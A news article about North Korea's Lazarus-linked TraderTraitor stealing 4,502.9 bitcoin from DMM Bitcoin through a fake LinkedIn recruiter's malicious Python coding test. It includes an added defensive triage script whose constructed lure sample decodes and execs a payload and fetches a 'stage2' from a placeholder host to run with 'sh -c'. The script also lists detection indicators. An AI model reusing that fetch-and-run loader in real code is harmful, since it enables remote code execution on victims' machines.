North Korean hackers linked to hack of 4,500 bitcoins from Japanese crypto exchange

North Korean hackers linked to the infamous Lazarus hacking group have been identified as being behind the theft of more than 4,500 bitcoins from Japanese cryptocurrency exchange DMM Bitcoin earlier this year.

The Federal Bureau of Investigation, in conjunction with the Department of Defense Cyber Crime Center and the National Police Agency of Japan, has revealed that hackers known as TraderTraitor, an arm of Lazarus, stole the equivalent of $308 million from DMM Bitcoin in May, and the agencies have detailed how the North Korean hackers did so.

The investigation into the hack found that in late March 2024, a North Korean cyber actor posing as a recruiter on LinkedIn contacted an employee at Ginco, a Japanese enterprise cryptocurrency wallet software company. The threat actor sent the target, who had access to Ginco's wallet management system, a URL pointing to a malicious Python script hosted on a GitHub page and presented as a pre-employment test. The victim copied the Python code to their personal GitHub page and was subsequently compromised.
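The lure in this case was a Python "coding test" that the target pulled into their own environment. The script below is an added example for this article, not code from the FBI/NPA statement, Ginco or DMM, and it shows the kind of static triage a practitioner can run over an untrusted test file before anyone executes it. The indicators it looks for (runtime decode followed by exec, outbound fetches, process spawning) are generic patterns assumed here; the article does not publish the actual script, and the two sample inputs are constructed, with a placeholder URL.

```python
"""Static triage of an untrusted Python 'coding test' before it is run.

Added example: not the incident's script and not code from the advisory.
Indicator sets below are assumptions (common loader patterns), not facts
taken from the article.
"""
import ast

# Constructed sample: a plausible exercise with a hidden loader tacked on.
# Not the real lure; the URL is a placeholder that is never contacted.
SAMPLE_LURE = '''\
import base64, urllib.request
import subprocess

def fizzbuzz(n):
    return "FizzBuzz" if n % 15 == 0 else "Fizz" if n % 3 == 0 else "Buzz" if n % 5 == 0 else str(n)

_c = base64.b64decode("cHJpbnQoJ2hlbGxvJyk=")
exec(_c)
data = urllib.request.urlopen("http://example.invalid/stage2").read()
subprocess.run(["sh", "-c", data.decode()])
'''

# Constructed sample: the same exercise with nothing hidden.
SAMPLE_BENIGN = '''\
def fizzbuzz(n):
    return "FizzBuzz" if n % 15 == 0 else "Fizz" if n % 3 == 0 else "Buzz" if n % 5 == 0 else str(n)

if __name__ == "__main__":
    print("\\n".join(fizzbuzz(i) for i in range(1, 16)))
'''

DYNAMIC_EXEC = {"exec", "eval", "compile", "__import__"}
DECODERS = {"b64decode", "b32decode", "b16decode", "unhexlify", "decompress", "fromhex"}
NETWORK_FETCH = {"urllib.request.urlopen", "requests.get", "requests.post",
                 "socket.create_connection", "http.client.HTTPConnection"}
PROCESS_SPAWN = {"subprocess.run", "subprocess.Popen", "subprocess.call",
                 "subprocess.check_output", "os.system", "os.popen"}


def _call_name(node: ast.Call) -> str:
    """Dotted name of a call target, e.g. 'urllib.request.urlopen' or 'exec'."""
    func, parts = node.func, []
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if isinstance(func, ast.Name):
        parts.append(func.id)
    return ".".join(reversed(parts))


def _is_decoder(node) -> bool:
    return isinstance(node, ast.Call) and _call_name(node).rsplit(".", 1)[-1] in DECODERS


def triage_python_source(src: str) -> dict:
    """Map each indicator to the sorted line numbers where it fires."""
    tree = ast.parse(src)
    hits = {k: [] for k in ("dynamic_exec", "decode_then_exec", "network_fetch", "process_spawn")}

    # Pass 1: names whose value came straight out of a decoder.
    decoded = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Assign) and _is_decoder(node.value):
            decoded.update(t.id for t in node.targets if isinstance(t, ast.Name))

    # Pass 2: every call site, matched by short name (exec/eval) or full dotted name.
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        name = _call_name(node)
        if name.rsplit(".", 1)[-1] in DYNAMIC_EXEC:
            hits["dynamic_exec"].append(node.lineno)
            arg = node.args[0] if node.args else None
            if _is_decoder(arg) or (isinstance(arg, ast.Name) and arg.id in decoded):
                hits["decode_then_exec"].append(node.lineno)
        if name in NETWORK_FETCH:
            hits["network_fetch"].append(node.lineno)
        if name in PROCESS_SPAWN:
            hits["process_spawn"].append(node.lineno)
    return {k: sorted(v) for k, v in hits.items()}


def verdict(hits: dict) -> str:
    """'block' when the file executes code it built at runtime, 'review' when a
    coding test reaches the network or spawns processes, else 'ok'."""
    if hits["decode_then_exec"] or hits["dynamic_exec"]:
        return "block"
    if hits["network_fetch"] or hits["process_spawn"]:
        return "review"
    return "ok"


if __name__ == "__main__":
    for label, src in (("lure", SAMPLE_LURE), ("benign", SAMPLE_BENIGN)):
        found = triage_python_source(src)
        print(label, verdict(found), found)
```

The point of the two-pass design is that loaders rarely write `exec(base64.b64decode(...))` on one line; the decoded payload is usually parked in a variable first, so the check follows the assignment rather than the call alone. Treat a "block" as a reason to open the file in a disposable VM, not on a workstation that holds wallet or session credentials.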

With the access gained, the TraderTraitor hackers sat patiently, waiting until May to exploit their access. To steal the bitcoin, the actors exploited session cookie information to impersonate the compromised employee and successfully gained access to Ginco’s unencrypted communications system. With this access, it’s believed that the hackers then manipulated a legitimate transaction request from a DMM employee, resulting in the theft of 4,502.9 bitcoin.

The stolen bitcoin was subsequently transferred to TraderTraitor-controlled wallets, which ultimately led back to the North Korean government.

“The FBI, National Police Agency of Japan and other U.S. government and international partners will continue to expose and combat North Korea’s use of illicit activities—including cybercrime and cryptocurrency theft—to generate revenue for the regime,” the FBI noted in a statement.

The involvement of North Korea and an arm of Lazarus in the hack comes as no surprise: DMM is not the first cryptocurrency exchange Lazarus has targeted, and it will not be the last.

In 2022, Lazarus was linked to the hack on the Ronin Network that led to the theft of $615 million in cryptocurrency, and more recently, in July, the group was linked to the theft of $234.9 million in cryptocurrency from India-based cryptocurrency exchange WazirX.

Image: SiliconANGLE/Ideogram
